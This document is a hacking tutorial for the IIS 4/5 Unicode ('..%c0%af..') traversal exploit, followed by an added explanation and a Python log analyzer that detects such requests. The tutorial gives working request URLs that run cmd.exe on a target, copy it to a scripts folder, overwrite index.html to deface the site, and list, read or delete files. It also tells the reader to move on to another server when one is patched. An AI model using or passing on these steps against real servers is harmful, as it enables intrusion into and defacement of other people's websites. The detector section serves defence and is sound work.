UNICODE EXPLOIT IIS 4 + 5

18-4-01 = This Tutorial has been written by THxZ0NE a.k.a THxZ a.k.a |THxZ0NE|
Do not change this tutorial without permission from me.
For questions mail to: Contact Secure Logics
--------------------------------------------------------------------------------

The subject of this tutorial is the UNICODE IIS 4 + 5 exploit.

NOTE: You can use unicodexecute2.pl in combination with ActivePerl, or use your web browser.
----------------------------------------------------------------------------------
If you use Windows, Grinder is a handy program to scan for web servers.
-----------------------------------------------------------------------------------

- All right, let's begin.
- The IP that we use for this example is 127.0.0.1
------------------------------------------------------------------------------------

1 ......

127.0.0.1 must be vulnerable to the exploit, so we type this command in our web browser:

    http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+c:

When you see the index of drive c:, then it is vulnerable.

First check that the directory c:\Inetpub\wwwroot exists. You do that like this:

    http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+c:\Inetpub\wwwroot

and check that c:\winnt\system32 exists like this:

    http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+c:\winnt\system32
-------------------------------------------------------------------------------------

2 ........

Then you must copy cmd.exe from c:\winnt\system32 to c:\Inetpub\scripts. You do that with the following command:

    http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+copy+c:\winnt\system32\cmd.exe%20c:\Inetpub\scripts\cmds.exe

When the directory Inetpub\scripts exists on another drive, for example e:, then you must type:

    http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+copy+c:\winnt\system32\cmd.exe%20e:\Inetpub\scripts\cmds.exe

When you have done this, you are ready to do anything you want to. But when you get the message "Access is denied", then the server is patched, and then you have to take another one.
-----------------------------------------------------------------------------------------

3 ......

Now you have to go to the directory where the page is. When Inetpub\wwwroot exists on c:, then you have to type this:

    http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+c:\Inetpub\wwwroot

or on e:

    http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+e:\Inetpub\wwwroot
-----------------------------------------------------------------------------------------

4 ......

When you see the HTML which you want to deface, for example index.html, then you need to type this:

    http://127.0.0.1/scripts/cmds.exe?+/c+echo+YOUR TEXT+>+c:\Inetpub\wwwroot\index.html

Now it will write the line "YOUR TEXT" to index.html, and when you open your browser and type http://127.0.0.1 you will see your line instead of the web page :)))

And you are ready!! But don't change too much... And send an email to the webmaster that he must update his server....
-------------------------------------------------------------------------------------------

You can also do other things, like making a directory:

    http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+mkdir+0wn3D_By_THxZ0NE
------------

Or when you want to look at drive d:, e: or f:, you need to type this:

    http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+d:
    http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+e:
    http://127.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+f:
-------------

Open a text file, for example zone.txt, on drive c:

    http://IP/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+type+c:\zone.txt
_________________________________________

- Some commands

echo:                 upload
dir+c:                look at the files on hard disk c:
del+c:\thxzone.txt    means that you delete the file thxzone.txt on drive c:
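What makes the requests above work is the %c0%af (and %c1%9c) sequence: it is an overlong UTF-8 encoding of "/" (or "\"), so the server's traversal check sees no path separator in the raw bytes, while the decoder that runs afterwards turns the sequence into one and lets ".." climb out of the /scripts directory into \winnt\system32. The defender's counterpart is to decode the way the vulnerable server did before looking for ".." and cmd.exe, and, as the tutorial says, to have the server updated. The following Python log analyzer is an added example, not code from this tutorial or from any tool it names. The access-log lines are constructed (Common Log Format), the IPs and timestamps are invented, and the rule that a request to cmd.exe or the renamed copy cmds.exe is always worth a look is an assumption of this example.

```python
"""Decode and flag IIS Unicode (overlong UTF-8) traversal requests in web logs.

Added example for this page; it is not code from the tutorial. The log lines
are constructed and reuse the request shape the page shows
(/scripts/..%c0%af../winnt/system32/cmd.exe?...).
"""
import re
from urllib.parse import unquote_to_bytes

# Constructed sample access-log lines (Common Log Format), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Apr/2001:10:00:01 +0000] "GET /default.asp HTTP/1.0" 200 1234
10.0.0.9 - - [18/Apr/2001:10:00:02 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+c: HTTP/1.0" 200 5678
10.0.0.9 - - [18/Apr/2001:10:00:03 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 5678
10.0.0.7 - - [18/Apr/2001:10:00:04 +0000] "GET /scripts/cmds.exe?/c+echo+hi HTTP/1.0" 200 12
10.0.0.2 - - [18/Apr/2001:10:00:05 +0000] "GET /scripts/../../winnt/system32/cmd.exe HTTP/1.0" 404 0
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
SEG_RE = re.compile(r'[/\\]')


def decode_lenient_utf8(data: bytes) -> str:
    """UTF-8 decode that also accepts overlong two-byte sequences.

    A strict decoder (Python's included) rejects lead bytes 0xC0/0xC1; the
    vulnerable IIS builds did not, so %c0%af became '/' and %c1%9c became
    '\\' after the traversal check had already run. Reproducing that leniency
    lets the detector see the path the server actually used. Other multi-byte
    sequences are replaced with U+FFFD, which is enough for path analysis.
    """
    out, i, n = [], 0, len(data)
    while i < n:
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < n and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append('\ufffd')
            i += 1
    return ''.join(out)


def resolve_path(path: str):
    """Collapse '.'/'..' segments; report whether '..' climbed above the root."""
    segments, escaped = [], False
    for seg in SEG_RE.split(path):
        if seg in ('', '.'):
            continue
        if seg == '..':
            if segments:
                segments.pop()
            else:
                escaped = True
        else:
            segments.append(seg)
    return '/' + '/'.join(segments), escaped


def count_dotdot(path: str) -> int:
    return sum(1 for seg in SEG_RE.split(path) if seg == '..')


def analyze_target(target: str) -> dict:
    """Classify one request target the way a detection rule would."""
    raw_path = target.split('?', 1)[0]
    decoded = decode_lenient_utf8(unquote_to_bytes(raw_path))
    resolved, escaped = resolve_path(decoded)
    verdict = {
        'raw': raw_path,
        'decoded': decoded,
        'resolved': resolved,
        # '..' that only appears after decoding is the evasion itself
        'hidden_traversal': count_dotdot(decoded) > count_dotdot(raw_path),
        'escapes_root': escaped,
        # cmd.exe, or the renamed copy the tutorial calls cmds.exe (assumed rule)
        'shell': re.search(r'cmds?\.exe$', resolved, re.I) is not None,
    }
    verdict['suspicious'] = (verdict['hidden_traversal']
                             or verdict['escapes_root'] or verdict['shell'])
    return verdict


def scan_log(text: str) -> list:
    """Return a verdict dict (with source ip) for every suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        v = analyze_target(m.group('target'))
        if v['suspicious']:
            v['ip'] = m.group('ip')
            findings.append(v)
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']}  {f['raw']}\n    -> {f['resolved']}  hidden="
              f"{f['hidden_traversal']} escapes={f['escapes_root']} shell={f['shell']}")
```

The first and the second sample request resolve to the same /winnt/system32/cmd.exe, yet only the encoded one has hidden_traversal set, because its ".." segments exist only after decoding; that difference is the signature of the evasion, whereas the plain "../../" request was already stopped by the server's own check (hence the 404). Running the decoder on the raw bytes before any pattern match is the design point: a rule that only greps for "../" in the undecoded URL misses exactly the requests this tutorial uses.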